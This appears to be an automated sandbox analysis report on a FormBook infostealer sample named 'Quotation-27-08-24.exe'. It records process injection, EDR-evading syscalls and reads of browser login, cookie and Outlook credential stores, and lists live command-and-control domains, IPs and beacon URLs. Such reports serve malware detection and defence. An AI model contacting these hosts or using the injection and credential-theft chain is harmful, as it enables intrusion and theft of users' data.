            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeMemory written: C:\Users\user\Desktop\Quotation-27-08-24.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: NULL target: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeSection loaded: NULL target: C:\Windows\SysWOW64\PING.EXE protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: NULL target: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: NULL target: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\PING.EXEThread register set: target process: 3884Jump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeProcess created: C:\Users\user\Desktop\Quotation-27-08-24.exe "C:\Users\user\Desktop\Quotation-27-08-24.exe"Jump to behavior
            Source: C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exeProcess created: C:\Windows\SysWOW64\PING.EXE "C:\Windows\SysWOW64\PING.EXE"Jump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: uExImirYECsTjI.exe, 00000008.00000002.4569133149.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000000.2396087697.0000000000FC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: uExImirYECsTjI.exe, 00000008.00000002.4569133149.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000000.2396087697.0000000000FC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: uExImirYECsTjI.exe, 00000008.00000002.4569133149.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000000.2396087697.0000000000FC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: uExImirYECsTjI.exe, 00000008.00000002.4569133149.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, uExImirYECsTjI.exe, 00000008.00000000.2396087697.0000000000FC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeQueries volume information: C:\Users\user\Desktop\Quotation-27-08-24.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Quotation-27-08-24.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\PING.EXEFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\PING.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.Quotation-27-08-24.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.Quotation-27-08-24.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.4565547263.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571817577.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2478449837.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2470137225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4571765564.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2471796851.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		312
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Remote System Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials1
            System Network Configuration Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSync2
            File and Directory Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc Filesystem113
            System Information Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499588 Sample: Quotation-27-08-24.exe Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 30 www.personal-loans-jp8.xyz 2->30 32 www.kontorpaneli.xyz 2->32 34 22 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 7 other signatures 2->50 10 Quotation-27-08-24.exe 3 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 32->48 process4 file5 28 C:\Users\user\...\Quotation-27-08-24.exe.log, ASCII 10->28 dropped 62 Injects a PE file into a foreign processes 10->62 14 Quotation-27-08-24.exe 10->14         started        17 Quotation-27-08-24.exe 10->17         started        signatures6 process7 signatures8 64 Maps a DLL or memory area into another process 14->64 19 uExImirYECsTjI.exe 14->19 injected process9 dnsIp10 36 gate-eight.net 92.204.210.213, 51193, 80 VELIANET-ASvelianetInternetdiensteGmbHDE Germany 19->36 38 sorriragora.online 162.240.81.18, 51247, 51248, 51249 UNIFIEDLAYER-AS-1US United States 19->38 40 12 other IPs or domains 19->40 52 Found direct / indirect Syscall (likely to bypass EDR) 19->52 23 PING.EXE 13 19->23         started        signatures11 process12 signatures13 54 Tries to steal Mail credentials (via file / registry access) 23->54 56 Tries to harvest and steal browser information (history, passwords, etc) 23->56 58 Modifies the context of a thread in another process (thread injection) 23->58 60 2 other signatures 23->60 26 firefox.exe 23->26         started        process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Quotation-27-08-24.exe33%VirustotalBrowse
            Quotation-27-08-24.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            glitterinthegrey.shop1%VirustotalBrowse
            www.indeks.space1%VirustotalBrowse
            www.kamicare-com.tokyo0%VirustotalBrowse
            adindadisini15.click1%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.cchelvn.shop1%VirustotalBrowse
            www.healthsolutions.top1%VirustotalBrowse
            www.sorriragora.online1%VirustotalBrowse
            www.adindadisini15.click1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.techcables.shop/0hup?gp=1&js=1&uuid=1724741004.9758137820&other_args=eyJ1cmkiOiAiLzBodXAi0%Avira URL Cloudsafe
            http://www.globyglen.info/76oh/0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.indeks.space&utm_medium=parking&utm_cam0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.kamicare-com.tokyo/sryw/?mvjDMBx8=i/J+8XVQTUqjXYi8BOJp91HUxYZ+c6AWCRJ9n1NtfUqKWarFGtf7pFdZZISJr4cvaVfHP+3ktlD0OUvuvz/pl/98wVf2KGrKM2ftp+skyT71Gb7AHg6oN/3q8TTnk2KegzCTKXU=&AT=RrjDj4Z85jYPlHG00%Avira URL Cloudsafe
            https://reg.ru0%Avira URL Cloudsafe
            https://www.reg.ru/hosting/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_host&0%Avira URL Cloudsafe
            http://www.adindadisini15.click/vufj/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.indeks.space/mjy7/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=cg99eHdIhH6PRmBvzzsY4n38eZmBksl3PUY+KkgGmlThXL3WC2dP6WW67TtKoTiLnNtMIhIq0So6UKQjTmNbIq3Et/8UbAXoANeZC4OXTx0MozCDv0bkromw6gd6nEy8FhxsXmw=0%Avira URL Cloudsafe
            http://www.glitterinthegrey.shop/zch2/0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_cms0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.cchelvn.shop0%Avira URL Cloudsafe
            http://www70.techcables.shop/0%Avira URL Cloudsafe
            http://www.glitterinthegrey.shop/zch2/?mvjDMBx8=aE5KdauoI4Y2umflLKCriqVYTdzyJYOxKMaFRYlB9+Sv37Nuz5MD+L3RaAAlRIcvVgOa2tpXA3nWnQsvE78wTxh4OatPeg0Yh8Bm15yxUJXRh7FOvkM1aT2MQQJBhGDX4aCwZoM=&AT=RrjDj4Z85jYPlHG00%Avira URL Cloudsafe
            https://www.reg.ru/whois/?check=&dname=www.indeks.space&amp;reg_source=parking_auto0%Avira URL Cloudsafe
            http://www.glitterinthegrey.shop/zch2/1%VirustotalBrowse
            http://www.cchelvn.shop1%VirustotalBrowse
            http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=4.010%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://gate-eight.net/wp-content/plugins/under-construction-page/themes/images/favicon.png0%Avira URL Cloudsafe
            http://nginx.net/0%Avira URL Cloudsafe
            http://fedoraproject.org/0%Avira URL Cloudsafe
            http://www.healthsolutions.top/p2w8/?mvjDMBx8=0JI5pBGkrmioG/Anacpz3k+IMSt3VJctkawy5IUNmMBmvSb9+k0qoiMhp0vaP6Gu/r9KODYGeXzVD0cydytp7UCw+eBZByGBQdX9huLjshPWbKtQplNWiDD8YzK/NJ1wwprBY8Q=&AT=RrjDj4Z85jYPlHG00%Avira URL Cloudsafe
            https://reg.ru0%VirustotalBrowse
            http://www.personal-loans-jp8.xyz/osae/0%Avira URL Cloudsafe
            http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=40%Avira URL Cloudsafe
            http://gate-eight.net/wp-content/plugins/under-construction-page/themes/light_bulb/style.css?v=4.010%Avira URL Cloudsafe
            https://www.reg.ru/dedicated/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_ser0%Avira URL Cloudsafe
            http://www.staffmasters.online/0jqq/0%Avira URL Cloudsafe
            http://www.cs0724sd92jj.cloud/dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXK+s4FKSFcfshdIf9ZYkD73wqhGP2I3Lsc8IXkGColEMvp7YUHZOAuQGwzpl+pcDPhm8cR3ChF/e3R/pt7cs4gBzisZlZ7cEhY=&AT=RrjDj4Z85jYPlHG00%Avira URL Cloudsafe
            http://www.stolex.top/kunq/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=e2pBBNKfhlcNZug/MlikLwl2FbwO8O5PulKDyYpFlUnCxZtvvcHmj1jMPp0LVU20n2VhUZuzz0qV7Mfxt0dNEDuQKyzOHg8PupeV8YN8l6deJxHpy2VUY+/g7EuAZK4kmgb6d+0=0%Avira URL Cloudsafe
            https://www.cs0724sd92jj.cloud/dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXK0%Avira URL Cloudsafe
            http://www.techcables.shop/0hup/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=dEhQ1XEV2cGux7LKlL+scgcBfO64DeKcVe19yXl7eYIZvhBzatxTyUaQx2TCVW77GzJhrYbmnII2KrJyLin2/kNdYev+ljAzma1yOM1J7qbV9Zx9z1N3S/Qs4ysm8OEw2XKCNmo=0%Avira URL Cloudsafe
            http://www.kontorpaneli.xyz/pziu/0%Avira URL Cloudsafe
            http://www.staffmasters.online/0jqq/?mvjDMBx8=AboyIhWIgkAsu1nqRInTjiDB5La4qA9HyyvfFBNZK/fCO9WV0V/gZMn0uKI8YjcOlIWVaRm32fVlTzhGJzR60qB7FB0ybEu2AENms3yOanM/608x1TKdZl2B8TKOA7VaQ/jM9wk=&AT=RrjDj4Z85jYPlHG00%Avira URL Cloudsafe
            https://fonts.bunny.net/css?family=Nunito:4000%Avira URL Cloudsafe
            http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/common.css?v=4.010%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.kamicare-com.tokyo/sryw/0%Avira URL Cloudsafe
            http://gate-eight.net/wp-includes/js/jquery/jquery.min.js0%Avira URL Cloudsafe
            https://parking.reg.ru/script/get_domain_data?domain_name=www.indeks.space&rand=0%Avira URL Cloudsafe
            http://www.indeks.space/mjy7/0%Avira URL Cloudsafe
            http://www.healthsolutions.top/p2w8/0%Avira URL Cloudsafe
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
            http://www.cs0724sd92jj.cloud/dk4s/0%Avira URL Cloudsafe
            http://www.sorriragora.online/4jqu/?mvjDMBx8=7Y4E7U2NZPWflm9zHmqMqimi+5VuLrMg6kjCj1EInif9PGb3NGzDdsXjsV7gO/0L54/q7blUjcSlxFaP/BkUPUPxQ1br5RU9Wx45qk4zaFXeqdDODb3rhKjRzSvczwWVhnNF6PY=&AT=RrjDj4Z85jYPlHG00%Avira URL Cloudsafe
            http://www.stolex.top/kunq/0%Avira URL Cloudsafe
            https://www.reg.ru/domain/new/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_ne0%Avira URL Cloudsafe
            http://www.cchelvn.shop/q1r7/0%Avira URL Cloudsafe
            http://www.kontorpaneli.xyz/pziu/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=EY+qgcjcqEvJaY+ALfwoPip36wdjh3xsdSy6XMjMfPv/Ir5Xz5+nGIw7jjJwblfp8IgSbQk1nTysBGMjrt/hxs8d+JiTcx1VzVYwtbha6lbR616oEW2vuE+H/qKkyJ7RSqcP4eo=0%Avira URL Cloudsafe
            http://www.sorriragora.online/4jqu/0%Avira URL Cloudsafe
            http://www.adindadisini15.click/vufj/?mvjDMBx8=+HD5AwEaNmB+2iuNGAXu8ZEboMIZq6yiRKp9PVW508Es4ofR/Ro4n6j7lKcu3Nlg5pjwPTuirHLo0Y+yTcgc2ol0tGxsrzJn3Qwp0zn1So0PhkHXRjdNu1v/OX+x6wvNfDHKpos=&AT=RrjDj4Z85jYPlHG00%Avira URL Cloudsafe
            http://www.globyglen.info/76oh/?mvjDMBx8=bkikPFO0y+dZ8FJVAZCFc8SLSjnSdRJGJM46ftFXLQOb8YZCjaJwx2qDHjBW5y2pzyppecjshIN6jiWBoFnF0mIbwCR4LMrqk0QV5plBln1dX3G3XbOh6jVBwPa42yOCsK/pJQQ=&AT=RrjDj4Z85jYPlHG00%Avira URL Cloudsafe
            http://adindadisini15.click/vufj/?mvjDMBx8=0%Avira URL Cloudsafe
            http://www.techcables.shop/0hup/0%Avira URL Cloudsafe
            http://gate-eight.net/wp-content/plugins/under-construction-page/themes/light_bulb/light_bulb_off.pn0%Avira URL Cloudsafe
